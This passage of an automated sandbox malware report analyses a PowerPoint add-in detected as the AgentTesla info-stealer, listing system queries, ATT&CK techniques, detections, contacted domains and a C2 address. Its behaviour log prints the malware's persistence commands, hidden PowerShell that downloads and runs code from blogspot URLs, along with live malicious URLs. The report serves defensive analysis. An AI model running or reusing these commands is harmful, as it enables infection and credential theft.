          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected AgentTesla
          Source: Yara match, File source: 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: Process Memory Space: aspnet_compiler.exe PID: 6068, type: MEMORYSTR

          Remote Access Functionality:

          Yara detected AgentTesla
          Source: Yara match, File source: 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: Process Memory Space: aspnet_compiler.exe PID: 6068, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Spearphishing Link 1 | Windows Management Instrumentation 211 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 11 | OS Credential Dumping | File and Directory Discovery 2 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scripting 22 | Scheduled Task/Job 1 | Extra Window Memory Injection 1 | Scripting 22 | LSASS Memory | System Information Discovery 114 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Native API 1 | Registry Run Keys / Startup Folder 21 | Access Token Manipulation 1 | Obfuscated Files or Information 1 | Security Account Manager | Security Software Discovery 121 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port 11 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | Exploitation for Client Execution 13 | Logon Script (Mac) | Process Injection 212 | Software Packing 1 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Scheduled Task/Job 1 | Network Logon Script | Scheduled Task/Job 1 | DLL Side-Loading 1 | LSA Secrets | Virtualization/Sandbox Evasion 141 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 14 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | PowerShell 1 | Rc.common | Registry Run Keys / Startup Folder 21 | Extra Window Memory Injection 1 | Cached Domain Credentials | Application Window Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading 1 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 141 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Access Token Manipulation 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
          Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection 212 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

          Behavior Graph

          [Figure: behavior graph. Behavior Graph ID: 553159, Sample: 3.ppam, Startdate: 14/01/2022, Architecture: WINDOWS, Score: 100]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          3.ppam | 26% | ReversingLabs | Document-Office.Downloader.Powdow

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          31.0.aspnet_compiler.exe.400000.4.unpack | 100% | Avira | TR/Dropper.MSIL.Gen2
          31.0.aspnet_compiler.exe.400000.1.unpack | 100% | Avira | TR/Dropper.MSIL.Gen2
          31.0.aspnet_compiler.exe.400000.3.unpack | 100% | Avira | TR/Dropper.MSIL.Gen2
          31.2.aspnet_compiler.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen2
          31.0.aspnet_compiler.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen2
          31.0.aspnet_compiler.exe.400000.2.unpack | 100% | Avira | TR/Dropper.MSIL.Gen2

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
          https://roaming.edog. | 0% | URL Reputation | safe
          https://cdn.entity. | 0% | URL Reputation | safe
          https://powerlift.acompli.net | 0% | URL Reputation | safe
          https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
          https://cortana.ai | 0% | URL Reputation | safe
          http://www.j.mp/asasdjiasjdiasjasdasddik | 0% | Avira URL Cloud | safe
          https://api.aadrm.com/ | 0% | URL Reputation | safe
          https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | URL Reputation | safe
          https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | 0% | Avira URL Cloud | safe
          https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
          https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
          https://officeci.azurewebsites.net/api/ | 0% | URL Reputation | safe
          https://5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com/ugd/5940e4_979408a19b03449f8221c8f8d235fa55.txt | 100% | Avira URL Cloud | malware
          http://kVEmyA.com | 0% | Avira URL Cloud | safe
          https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
          https://api.aadrm.com | 0% | URL Reputation | safe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
          https://go.micro | 0% | URL Reputation | safe
          https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
          https://www.odwebp.svc.ms | 0% | URL Reputation | safe
          https://api.addins.store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
          https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
          https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
          https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
          https://ncus.contentsync. | 0% | URL Reputation | safe
          https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
          https://wus2.contentsync. | 0% | URL Reputation | safe
          http://207.32.217.137:8081x&bq( | 0% | Avira URL Cloud | safe
          https://asgsmsproxyapi.azurewebsites.net/ | 0% | URL Reputation | safe
          http://207.32.217.137:8081/n/p6df/asshole/08e40c81aa01a5cf.php127.0.0.1POST | 0% | Avira URL Cloud | safe
          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.mediafire.com | 104.16.202.237 | true | false | | high
          bit.ly | 67.199.248.11 | true | false | | high
          blogspot.l.googleusercontent.com | 142.250.186.129 | true | false | | high
          j.mp | 67.199.248.17 | true | false | | unknown
          gcp.media-router.wixstatic.com | 34.102.176.152 | true | false | | high
          download2262.mediafire.com | 199.91.155.3 | true | false | | high
          p26ynn.blogspot.com | unknown | unknown | false | | high
          p6tbbb.blogspot.com | unknown | unknown | false | | high
          www.j.mp | unknown | unknown | true | | unknown
          5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com | unknown | unknown | true | | unknown

          Contacted URLs


          URLs from Memory and Binaries


                                                                                                                                                                      Contacted IPs


                                                                                                                                                                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.16.202.237 | www.mediafire.com | United States | 13335 | CLOUDFLARENETUS | false
142.250.186.129 | blogspot.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false
67.199.248.17 | j.mp | United States | 396982 | GOOGLE-PRIVATE-CLOUDUS | false
104.16.203.237 | unknown | United States | 13335 | CLOUDFLARENETUS | false
34.102.176.152 | gcp.media-router.wixstatic.com | United States | 15169 | GOOGLEUS | false
207.32.217.137 | unknown | United States | 143151 | GSERVERSUS | true
199.91.155.3 | download2262.mediafire.com | United States | 46179 | MEDIAFIREUS | false
67.199.248.11 | bit.ly | United States | 396982 | GOOGLE-PRIVATE-CLOUDUS | false

                                                                                                                                                                      Private

                                                                                                                                                                      IP
                                                                                                                                                                      192.168.2.1

                                                                                                                                                                      General Information

                                                                                                                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                                      Analysis ID:553159
                                                                                                                                                                      Start date:14.01.2022
                                                                                                                                                                      Start time:12:18:26
                                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                                      Overall analysis duration:0h 8m 55s
                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                      Report type:full
                                                                                                                                                                      Sample file name:3.ppam
                                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                                      Number of analysed new started processes analysed:39
                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                      Technologies:
                                                                                                                                                                      • HCA enabled
                                                                                                                                                                      • EGA enabled
                                                                                                                                                                      • HDC enabled
                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                      Detection:MAL
                                                                                                                                                                      Classification:mal100.troj.expl.evad.winPPAM@27/30@17/9
                                                                                                                                                                      EGA Information:
                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                      HDC Information:Failed
                                                                                                                                                                      HCA Information:
                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                      • Number of executed functions: 93
                                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                      • Adjust boot time
                                                                                                                                                                      • Enable AMSI
                                                                                                                                                                      • Found application associated with file extension: .ppam
                                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                      • Found warning dialog
                                                                                                                                                                      • Click Ok
                                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                                      • Scroll down
                                                                                                                                                                      • Close Viewer
                                                                                                                                                                      Warnings:
                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 52.109.32.63, 52.109.8.25, 52.109.12.23, 52.109.12.21, 52.109.76.34, 52.109.88.38
                                                                                                                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                      • Report size getting too big, too many NtSetValueKey calls found.
                                                                                                                                                                      • VT rate limit hit for: 3.ppam

                                                                                                                                                                      Simulations

                                                                                                                                                                      Behavior and APIs

Time | Type | Description
12:20:05 | API Interceptor | 587x Sleep call for process: powershell.exe modified
12:20:34 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NetwrixParam powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p6tbbb.blogspot.com/atom.xml" -useB|iex;
12:20:39 | Task Scheduler | Run new task: akohijijkuhdi path: powershell s>-w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p26ynn.blogspot.com/atom.xml" -useB|iex;
12:20:43 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NetwrixParam powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p6tbbb.blogspot.com/atom.xml" -useB|iex;
12:21:24 | API Interceptor | 122x Sleep call for process: aspnet_compiler.exe modified

                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                      IPs


                                                                                                                                                                      Domains

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                                                                                                                      ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                                                                                                                      JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      25oAqEsPvH.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      20145639704.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      2098765432345678909876543234567890987654.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      FedEx_Shipping_Documents_009800.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      K5CrmTWqYm.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      Invoice Slide.ppamGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      PO 182782.ppamGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      qyLAijGe7S.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      GP32t1WkPk.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      4nmeEJrZJ9.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      PO-98766.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      XY098765434567890987654567d4beYmQGc7ia9.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      gunzipped.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      Amended Copy of Invoice.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      tivDpdRokf.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      Payment slip & Invoices.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237

                                                                                                                                                                      Dropped Files

                                                                                                                                                                      No context

                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\8C01FE73-17BC-469B-9266-AF90E081EBE6
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):141109
